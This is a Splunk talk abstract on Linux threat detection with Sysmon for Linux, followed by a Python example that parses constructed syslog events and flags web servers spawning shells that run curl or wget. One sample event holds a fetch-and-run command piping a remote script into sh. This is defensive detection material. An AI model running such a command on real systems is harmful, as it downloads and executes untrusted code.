The release of Microsoft Sysmon for Linux gives defenders new opportunities for monitoring, management, and detection development on Linux hosts. The Splunk Threat Research Team has developed several analytic stories addressing Linux threat detection. In this presentation we show how to use the latest Splunk Attack Range to replicate attacks, record the resulting Sysmon for Linux telemetry, analyze it, and develop detections from it. We also cover why monitoring and hardening Linux systems matters, and the Splunk SOAR tooling available to automate investigation and response.
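As a concrete illustration of the kind of detection development the abstract refers to, here is an added example that is not part of the presentation or the Splunk Threat Research Team's own content. Sysmon for Linux writes each event to syslog as one line whose message body is an XML Event document using the same schema as Windows Sysmon (EventID 1 is ProcessCreate). The two syslog lines below are constructed for this example, not captured data; the hostnames, PIDs, command lines and the IP address are invented. The detection logic, a web server process spawning a shell whose command line invokes a download utility, is a common pattern for web-facing Linux hosts; in Splunk it would be written as an SPL search over the ingested Sysmon events, but it is shown here in Python so it runs offline.

```python
"""Parse Sysmon for Linux syslog lines and run a simple detection over them.

Sysmon for Linux logs each event via syslog as a single line whose message
body is an XML <Event> document. The sample below is CONSTRUCTED for this
example (invented host, PIDs, users, command lines and IP address).
"""
import re
import xml.etree.ElementTree as ET

# Constructed sample: two EventID 1 (ProcessCreate) events on host "web01".
# The first is a web server spawning a shell that pipes a download into sh;
# the second is a benign interactive command from an admin shell.
SAMPLE_SYSLOG = r"""
Oct 21 10:12:14 web01 sysmon: <Event><System><Provider Name="Linux-Sysmon"/><EventID>1</EventID><Computer>web01</Computer></System><EventData><Data Name="RuleName">-</Data><Data Name="UtcTime">2021-10-21 10:12:14.000</Data><Data Name="ProcessId">4242</Data><Data Name="Image">/usr/bin/bash</Data><Data Name="CommandLine">bash -c curl -s http://198.51.100.7/x.sh | sh</Data><Data Name="User">www-data</Data><Data Name="ParentImage">/usr/sbin/apache2</Data><Data Name="ParentCommandLine">/usr/sbin/apache2 -k start</Data></EventData></Event>
Oct 21 10:12:20 web01 sysmon: <Event><System><Provider Name="Linux-Sysmon"/><EventID>1</EventID><Computer>web01</Computer></System><EventData><Data Name="RuleName">-</Data><Data Name="UtcTime">2021-10-21 10:12:20.000</Data><Data Name="ProcessId">4250</Data><Data Name="Image">/usr/bin/ls</Data><Data Name="CommandLine">ls -la /var/www</Data><Data Name="User">admin</Data><Data Name="ParentImage">/usr/bin/bash</Data><Data Name="ParentCommandLine">-bash</Data></EventData></Event>
"""

# One event per syslog line, so a greedy match on a single line is safe.
EVENT_RE = re.compile(r"(<Event>.*</Event>)")


def parse_sysmon_line(line):
    """Return a flat dict of EventID plus every EventData field, or None."""
    m = EVENT_RE.search(line)
    if not m:
        return None
    root = ET.fromstring(m.group(1))
    event = {"EventID": int(root.findtext("System/EventID"))}
    for data in root.iter("Data"):          # <Data Name="Image">...</Data>
        event[data.get("Name")] = data.text or ""
    return event


def parse_syslog(text):
    """Parse a block of syslog text, skipping lines without a Sysmon event."""
    parsed = (parse_sysmon_line(line) for line in text.splitlines())
    return [e for e in parsed if e is not None]


# Process names (basenames) used by the detection; extend for your estate.
WEB_SERVERS = {"apache2", "httpd", "nginx", "php-fpm"}
SHELLS = {"sh", "bash", "dash", "zsh"}
DOWNLOADERS = ("curl", "wget")


def basename(path):
    return path.rsplit("/", 1)[-1]


def detect_web_shell_download(events):
    """Flag ProcessCreate events where a web server spawns a shell that
    runs curl/wget. Returns a list of alert dicts (empty when nothing fires)."""
    alerts = []
    for e in events:
        if e.get("EventID") != 1:
            continue
        parent = basename(e.get("ParentImage", ""))
        child = basename(e.get("Image", ""))
        cmd = e.get("CommandLine", "")
        if parent in WEB_SERVERS and child in SHELLS and any(d in cmd for d in DOWNLOADERS):
            alerts.append({
                "rule": "web_server_spawned_shell_with_download",
                "host": e.get("Computer", ""),
                "UtcTime": e.get("UtcTime", ""),
                "ProcessId": e.get("ProcessId", ""),
                "User": e.get("User", ""),
                "ParentImage": e.get("ParentImage", ""),
                "CommandLine": cmd,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_web_shell_download(parse_syslog(SAMPLE_SYSLOG)):
        print(alert)
```

The `Computer` element sits under `System`, not `EventData`, so the parser above does not pick it up into the dict; the alert's `host` field is therefore empty on this sample unless you also read `System/Computer`, which is a deliberate reminder that Sysmon metadata and EventData live in different parts of the XML. Match on basenames rather than full paths, since shells and web servers are installed under different prefixes across distributions.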